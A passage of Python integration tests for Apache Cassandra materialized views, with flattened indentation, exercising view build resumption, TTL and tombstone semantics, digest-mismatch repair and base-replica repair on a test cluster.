session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row if all columns in base are removed including unselected
Able to recreate view row if at least one selected column alive
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# insert livenesssInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=5, view row is alive (selected column should not affects each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
# update unselected with ttl=10, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
# view row still alive due to base livenessInfo
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
# shadow (a=2, k=2) after 3 second
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
# For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
# For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
# For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view row with expired liveness except for row 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
# sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows), [[i, i, 'a' == 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
# this should not make Keyspace.apply throw WTE on failure to acquire lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
